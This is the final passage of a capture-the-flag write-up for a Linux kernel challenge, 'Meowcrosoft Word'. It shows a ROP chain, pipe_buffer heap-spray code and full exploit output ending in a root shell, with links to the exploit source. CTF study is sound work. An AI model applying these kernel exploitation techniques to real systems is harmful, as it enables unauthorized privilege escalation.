    *rop++ = 0x4141414141414141;
    *rop++ = 0x4141414141414141;
    *rop++ = 0x4141414141414141;
    *rop++ = kernel_base + 0x0ba280; // prepare_kernel_cred 
    *rop++ = kernel_base + 0x034df3; // pop rcx ; ret
    *rop++ = heap_addr + 0x178; 
    *rop++ = kernel_base + 0x3c72a7; // push rax ; jmp qword ptr [rcx]
    *rop++ = 0x4141414141414141;
    *rop++ = 0x4242424242424242;
    *rop++;
    *rop++ = 0x4444444444444444;
    *rop++ = 0x4545454545454545;
    *rop++ = kernel_base + 0x0b9ff0; // commit_creds
    *rop++ = kernel_base + 0xe97d68; // swapgs
    *rop++ = kernel_base + 0x037bc3; // iretq
    *rop++ = user_rip;
    *rop++ = user_cs; 
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss; 
    
    signal(SIGSEGV, get_shell);
    
    // Spray pipe_buf objects
    printf("[+] Spraying fake pipe_buffer objects\n");
    for (int i = 0; i < NUM_SOCKETS; i++) {
        for (int j = 0; j < NUM_SKBUFFS; j++) {
            if (write(ss[i][0], secondary_buf, sizeof(secondary_buf)) < 0) {
                perror("[!] write");
                exit(-1);
            }
        }
    }
    
    printf("[+] Releasing pipe_buffer objects\n");
    for (int i = 0; i < NUM_PIPEFDS; i++) {
        if (close(pipefd[i][0]) < 0) {
            perror("[!] close");
            exit(-1);
        }
        if (close(pipefd[i][1]) < 0) {
            perror("[!] close");
            exit(-1);
        }
    }

Note that instead of calling the classic prepare_kernel_cred(0), you now need to call perpare_kernel_cred(&init_task). This is due to https://lore.kernel.org/lkml/Y1q53XlLE2n9yGH7@bombadil.infradead.org/T/.

Now, all that is left to do is to enjoy your shell :3333

Output of exploit:

STAGE 1: SETUP
[+] Initial setup
[+] Setting up pipes
[+] Making FUSE directory /tmp/fuse_dir
[+] Starting FUSE filesystem
[+] Opening FUSE file write1
[+] Opening FUSE file write2
[+] Setting up sockets
[+] Setting up msg queues
[+] Opening Meowcrosoft Word device
STAGE 2: KERNEL TEXT AND HEAP LEAKS
[+] Created new doc
[+] Creating thread for write2
--> Trying to read /write2, 0, 4096
[+] Blocking FUSE read thread
[+] Entering write2 thread
[+] Creating thread for write1
[+] Entered write1 thread
[+] Performed free
[+] Spraying timerfd
--> Trying to read /write1, 0, 4096
[+] Blocking FUSE read thread
[+] Performed read
[+] Kernel text leak: ffffffffa72e91e0
[+] Kernel text base: ffffffffa7000000
[+] Freeing timerfd spray
[+] Spraying primary msg_msg objects
[+] Spraying secondary msg_msg objects
[+] Unblocked FUSE read thread
[+] Finished write1 thread
[+] Performed write
[+] Finding corrupted message
[+] Leaked primary msg_msg contents
[+] kheap 1024 address: ffff9d47044fc400
[+] msg_msg prev address: ffff9d47044963c0
[+] corrupted msg_msg idx: 24
[+] next msg_msg idx: 28
[+] kheap pt1: ffff9d47044ff800
[+] kheap pt2: ffff9d470470a7c0
[+] Finished write2 thread
[*] From FUSE: ffff9d47044fc400
[*] From FUSE: ffff9d47044963c0
[*] From FUSE: 41
[+] Unblocked FUSE read thread
[+] Performed write
STAGE 3: ROP TIME
[+] Freeing the next_idx secondary msg_msg
[+] Spraying sk_buff objects
[+] Freeing the corrupted_idx secondary msg_msg
[+] Spraying pipe_buf over freed 1024 area
[+] Freeing pipe_buffer objects
[+] Saved state
[+] Spraying fake pipe_buffer objects
[+] Releasing pipe_buffer objects
[+] Returned to userland
[+] UID: 0, got root!
# :333333 YAY SHELLZ

Hope that yall had fun with the challenge and thanks for reading this! :3

You can get the challenge files here: https://github.com/KaligulaArmblessed/CTF-Challenges/tree/main/Meowcrosoft_Word

The full exploit can be obtained here: https://github.com/KaligulaArmblessed/CTF-Challenges/blob/main/Meowcrosoft_Word/exploit.c

Special thanks to HITCON and Billy for inspiration, STAR Labs for the idea, and everyone for playing :D

Meowcrosoft Word [STANDCON 2023] - Mon, Dec 11, 2023